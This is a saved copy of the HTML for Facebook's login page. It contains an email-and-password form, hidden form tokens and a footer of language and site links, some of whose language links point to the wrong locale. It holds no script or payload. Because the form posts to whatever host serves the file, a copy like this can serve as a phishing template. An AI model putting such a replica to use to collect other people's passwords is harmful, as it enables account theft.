<!DOCTYPE html>
<html lang="en" id="facebook" class="no_js">
    <head>
        <meta charset="utf-8" />
        <meta name="referrer" content="origin-when-crossorigin" id="meta_referrer"
        />
        <style nonce="6Pkjg4nX">
        </style>
        <noscript>
            <meta http-equiv="refresh" content="0; URL=/?_fb_noscript=1" />
        </noscript>

        <title id="pageTitle">
            Facebook - log in or sign up
        </title>
        <meta name="bingbot" content="noarchive" />
        <meta property="og:site_name" content="Facebook" />
        <meta property="og:url" content="https://www.facebook.com/" />
        <meta property="og:image" content="https://www.facebook.com/images/fb_icon_325x325.png"
        />
        <meta property="og:locale" content="en_US" />
        <link rel="alternate" media="only screen and (max-width: 640px)" href="https://m.facebook.com/"
        />
        <link rel="alternate" media="handheld" href="https://m.facebook.com/"
        />
        <meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know."
        />
        <link rel="canonical" href="https://www.facebook.com/" />
        <link rel="icon" href="https://static.xx.fbcdn.net/rsrc.php/yx/r/e9sqr8WnkCf.ico"
        />
        <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v5/yB/l/0,cross/ORYsqbuNBbG.css"
        data-bootloader-hash="n+36Djy" crossorigin="anonymous" />
        <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v5/yv/l/0,cross/9ao2XiCSP4l.css"
        data-bootloader-hash="wXaVolg" crossorigin="anonymous" />
        <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v5/yL/l/0,cross/4bPnVE9p5lb.css"
        data-bootloader-hash="OmqzBB2" crossorigin="anonymous" />

    </head>
    
    <body class="fbIndex UIPage_LoggedOut _-kb _605a b_c3pyn-ahh chrome webkit win x1 Locale_en_US"
    dir="ltr">
        <div class="_li" id="u_0_1_O3">
            <div id="globalContainer" class="uiContextualLayerParent">
                <div class="fb_content clearfix " id="content" role="main">
                    <div>
                        <div class="_8esj _95k9 _8esf _8opv _8f3m _8ilg _8icx _8op_ _95ka">
                            <div class="_8esk">
                                <div class="_8esl">
                                    <div class="_8ice">
                                        <img class="fb_logo _8ilh img" src="https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg"
                                        alt="Facebook" />
                                    </div>
                                    <h2 class="_8eso">
                                        Connect with friends and the world around you on Facebook.
                                    </h2>
                                </div>
                                <div class="_8esn">
                                    <div class="_8iep _8icy _9ahz _9ah-">
                                        <div class="_6luv _52jv">
                                            <form class="_9vtf" data-testid="royal_login_form"
                                            method="post" id="u_0_2_Ev">
                                                <input type="hidden" name="jazoest" value="21055" autocomplete="off" />
                                                <input type="hidden" name="lsd" value="AVplaMqxWeY" autocomplete="off"
                                                />
                                                <div>
                                                    <div class="_6lux">
                                                        <input type="text" class="inputtext _55r1 _6luy" name="email" id="email"
                                                        data-testid="royal-email" placeholder="Email or phone number" autofocus="1"
                                                        aria-label="Email or phone number" />
                                                    </div>
                                                    <div class="_6lux">
                                                        <div class="_6luy _55r1 _1kbt" id="passContainer">
                                                            <input type="password" class="inputtext _55r1 _6luy _9npi" name="pass"
                                                            id="pass" data-testid="royal-pass" placeholder="Password" aria-label="Password"
                                                            />
                                                            <div class="_9ls7" id="u_0_3_az">
                                                                <a href="#" role="button">
                                                                    <div class="_9lsa">
                                                                        <div class="_9lsb" id="u_0_4_x9">
                                                                        </div>
                                                                    </div>
                                                                </a>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                                <input type="hidden" autocomplete="off" name="login_source" value="comet_headerless_login"
                                                />
                                                <input type="hidden" autocomplete="off" name="next" value="" />
                                                <div class="_6ltg">
                                                    <button value="1" class="_42ft _4jy0 _6lth _4jy6 _4jy1 selected _51sy"
                                                    name="login" data-testid="royal-login-button" type="submit" id="u_0_5_AW">
                                                        Log In
                                                    </button>
                                                </div>
                                                <div class="_6ltj">
                                                    <a href="https://www.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_screen=0"
                                                    id="u_0_6_6+">
                                                        Forgot password?
                                                    </a>
                                                </div>
                                                <div class="_8icz">
                                                </div>
                                                <div class="_6ltg">
                                                    <a role="button" class="_42ft _4jy0 _6lti _4jy6 _4jy2 selected _51sy"
                                                    href="https://www.facebook.com/r.php?entry_point=login" ajaxify="" id="u_0_0_lE" data-testid="open-registration-form-button">
                                                        Create new account
                                                    </a>
                                                </div>
                                            </form>
                                        </div>
                                        <div id="reg_pages_msg" class="_58mk">
                                            <a href="/pages/create/?ref_type=registration_form" class="_8esh">
                                                Create a Page
                                            </a>
                                            for a celebrity, brand or business.
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="">
                    <div class="_95ke _8opy">
                        <div id="pageFooter" data-referrer="page_footer" data-testid="page_footer">
                            <ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i"
                            data-nocookies="1">
                                <li>
                                    English (US)
                                </li>
                                <li>
                                    <a class="_sv4" dir="ltr" href="https://www.facebook.com/" title="Simplified Chinese (China)"
                                    id="u_0_7_US">
                                        中文(简体)
                                    </a>
                                </li>
                                <li>
                                    <a class="_sv4" dir="ltr" href="https://zh-cn.facebook.com/" title="Japanese"
                                    id="u_0_8_8H">
                                        日本語
                                    </a>
                                </li>
                                <li>
                                    <a class="_sv4" dir="ltr" href="https://ja-jp.facebook.com/" title="Korean"
                                    id="u_0_9_eu">
                                        한국어
                                    </a>
                                </li>
                                <li>
                                    <a class="_sv4" dir="ltr" href="https://ko-kr.facebook.com/" title="French (France)"
                                    id="u_0_a_Hh">
                                        Français (France)
                                    </a>
                                </li>
                                <li>
                                    <a class="_sv4" dir="ltr" href="https://fr-fr.facebook.com/" title="Indonesian"
                                    id="u_0_b_/j">
                                        Bahasa Indonesia
                                    </a>
                                </li>
                                <li>
                                    <a class="_sv4" dir="ltr" href="https://id-id.facebook.com/" title="Polish"
                                    id="u_0_c_Cs">
                                        Polski
                                    </a>
                                </li>
                                <li>
                                    <a class="_sv4" dir="ltr" href="https://pl-pl.facebook.com/" title="Spanish"
                                    id="u_0_d_/7">
                                        Español
                                    </a>
                                </li>
                                <li>
                                    <a class="_sv4" dir="ltr" href="https://es-la.facebook.com/" title="Portuguese (Brazil)"
                                    id="u_0_e_Gb">
                                        Português (Brasil)
                                    </a>
                                </li>
                                <li>
                                    <a class="_sv4" dir="ltr" href="https://pt-br.facebook.com/" title="German"
                                    id="u_0_f_2Z">
                                        Deutsch
                                    </a>
                                </li>
                                <li>
                                    <a class="_sv4" dir="ltr" href="https://de-de.facebook.com/" title="Italian"
                                    id="u_0_g_Px">
                                        Italiano
                                    </a>
                                </li>
                                <li>
                                    <a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fit-it.facebook.com%2F&amp;source=www_list_selector_more"
                                    href="#" title="Show more languages">
                                        <i class="img sp_YbiIuPczOY_ sx_089752">
                                        </i>
                                    </a>
                                </li>
                            </ul>
                            <div id="contentCurve">
                            </div>
                            <div id="pageFooterChildren" role="contentinfo" aria-label="Facebook site links">
                                <ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i">
                                    <li>
                                        <a href="https://www.facebook.com/reg/" title="Sign Up for Facebook">
                                            Sign Up
                                        </a>
                                    </li>
                                    <li>
                                        <a href="https://www.facebook.com/login/" title="Log into Facebook">
                                            Log In
                                        </a>
                                    </li>
                                    <li>
                                        <a href="https://messenger.com/" title="Check out Messenger.">
                                            Messenger
                                        </a>
                                    </li>
                                    <li>
                                        <a href="https://www.facebook.com/lite/" title="Facebook Lite for Android.">
                                            Facebook Lite
                                        </a>
                                    </li>
                                    <li>
                                        <a href="https://www.facebook.com/watch/" title="Browse in Video">
                                            Video
                                        </a>
                                    </li>
                                    <li>
                                        <a href="https://about.meta.com/technologies/meta-pay" title="Learn more about Meta Pay"
                                        target="_blank">
                                            Meta Pay
                                        </a>
                                    </li>
                                    <li>
                                        <a href="https://www.meta.com/" title="Check out Meta" target="_blank">
                                            Meta Store
                                        </a>
                                    </li>
                                    <li>
                                        <a href="https://www.meta.com/quest/" title="Learn more about Meta Quest"
                                        target="_blank">
                                            Meta Quest
                                        </a>
                                    </li>
                                    <li>
                                        <a href="https://www.meta.com/ai-glasses/?utm_source=www.facebook.com&utm_medium=organicsearch" title="Learn more about Ray-Ban Meta"
                                        target="_blank">
                                            Ray-Ban Meta
                                        </a>
                                    </li>
                                    <li>
                                        <a href="https://www.meta.ai/" title="Meta AI">
                                            Meta AI
                                        </a>
                                    </li>
                                    <li>
                                        <a href="https://www.instagram.com"
                                        title="Check out Instagram" target="_blank">
                                            Instagram
                                        </a>
                                    </li>
                                    <li>
                                        <a href="https://www.threads.net/" title="Check out Threads">
                                            Threads
                                        </a>
                                    </li>
                                    <li>
                                        <a href="https://www.facebook.com/votinginformationcenter/" title="See the Voting Information Center.">
                                            Voting Information Center
                                        </a>
                                    </li>
                                    <li>
                                        <a href="https://www.facebook.com/privacy/policy/?entry_point=facebook_page_footer" title="Learn how we collect, use and share information to support Facebook.">
                                            Privacy Policy
                                        </a>
                                    </li>
                                    <li>
                                        <a href="https://www.facebook.com/privacy/policies/health/?entry_point=facebook_page_footer" title="Learn how to manage and control your privacy on Facebook.">
                                            Consumer Health Privacy
                                        </a>
                                    </li>
                                    <li>
                                        <a href="https://www.facebook.com/privacy/center/?entry_point=facebook_page_footer" title="Learn how to manage and control your privacy on Facebook.">
                                            Privacy Center
                                        </a>
                                    </li>
                                    <li>
                                        <a href="https://about.meta.com/" accesskey="8" title="Read our blog, discover the resource center, and find job opportunities.">
                                            About
                                        </a>
                                    </li>
                                    <li>
                                        <a href="https://www.facebook.com"
                                        title="Advertise on Facebook.">
                                            Create ad
                                        </a>
                                    </li>
                                    <li>
                                        <a href="https://www.facebook.com/pages/create/?ref_type=site_footer" title="Create a page">
                                            Create Page
                                        </a>
                                    </li>
                                    <li>
                                        <a href="https://developers.facebook.com/?ref=pf" title="Develop on our platform.">
                                            Developers
                                        </a>
                                    </li>
                                    <li>
                                        <a href="https://www.metacareers.com" title="Make your next career move to our awesome company.">
                                            Careers
                                        </a>
                                    </li>
                                    <li>
                                        <a href="https://www.facebook.com/privacy/policies/cookies/?entry_point=cookie_policy_redirect&entry=0" title="Learn about cookies and Facebook.">
                                            Cookies
                                        </a>
                                    </li>
                                    <li>
                                        <a class="_41ug" data-nocookies="1" href="https://www.facebook.com/help/568137493302217"
                                        title="Learn about Ad Choices.">
                                            Ad choices
                                            <i class="img sp_YbiIuPczOY_ sx_b2cf63">
                                            </i>
                                        </a>
                                    </li>
                                    <li>
                                        <a data-nocookies="1" href="https://www.facebook.com/policies_center/" accesskey="9" title="Review our terms and policies.">
                                            Terms
                                        </a>
                                    </li>
                                    <li>
                                        <a href="https://www.facebook.com/help/?ref=pf" title="Visit our Help Center.">
                                            Help
                                        </a>
                                    </li>
                                    <li>
                                        <a href="https://www.facebook.com/help/637205020878504" title="Visit our Contact Uploading &amp; Non-Users Notice.">
                                            Contact Uploading &amp; Non-Users
                                        </a>
                                    </li>
                                    <li>
                                        <a accesskey="6" class="accessible_elem" href="/settings" title="View and edit your Facebook settings.">
                                            Settings
                                        </a>
                                    </li>
                                    <li>
                                        <a accesskey="7" class="accessible_elem" href="/allactivity?privacy_source=activity_log_top_menu"
                                        title="View your activity log">
                                            Activity log
                                        </a>
                                    </li>
                                </ul>
                            </div>
                            <div class="mvl copyright">
                                <div>
                                    <span>
                                        Meta © 2025
                                    </span>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div>
            </div>
            <span>
                <img src="https://facebook.com/security/hsts-pixel.gif" width="0" height="0"
                style="display:none" />
            </span>
        </div>
        <div style="display:none">
        </div>
    </body>

</html>
